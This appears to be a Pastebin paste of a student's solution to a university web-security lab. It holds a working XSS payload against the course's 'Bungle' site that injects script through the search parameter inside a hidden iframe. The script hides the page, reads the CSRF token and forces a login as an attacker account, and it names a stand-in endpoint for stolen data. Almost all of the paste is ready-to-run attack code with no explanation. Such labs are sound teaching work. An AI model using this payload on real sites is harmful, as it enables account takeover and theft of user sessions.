Advertisement
Guest User

Untitled

a guest
Oct 7th, 2016
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1.  
  2.  
  3. <meta charset="utf-8">
  4. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  5. <script>
  6.  
  7. $(document).ready(function() {
  8. var url = makeLink(xssdefense, target, attacker);
  9. $("#frame").attr("src", url);
  10. });
  11.  
  12. // Extend this function:
  13. function payload() {
  14. function proxy(href) {
  15. $('html').load(href, function(){
  16. console.log('loaded nex page');
  17. $('html').show();
  18. console.log($('input[name=csrf_token]').val());
  19. $.post('http://bungle-cs461.cs.illinois.edu/login?csrfdefense=1&xssdefense=0', {username: 'attacker', password: 'l33th4x', csrf_token: $('input[name=csrf_token]').val() });
  20. });
  21. }
  22. $('html').hide();
  23. proxy('./');
  24. }
  25.  
  26. function makeLink(xssdefense, target, attacker) {
  27. return target + "./search?csrfdefense=1&xssdefense=0" + "&q=" +
  28. encodeURIComponent("<script" + ">" + payload.toString() +
  29. ";payload();</script" + ">");
  30. }
  31.  
  32. var xssdefense = 0;
  33. var target = "http://bungle-cs461.cs.illinois.edu/";
  34. var attacker = "http://127.0.0.1:31337/stolen";
  35.  
  36. </script>
  37.  
  38. <iframe hidden id = "frame" src = "" width = "100%" height = "300"> </iframe>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement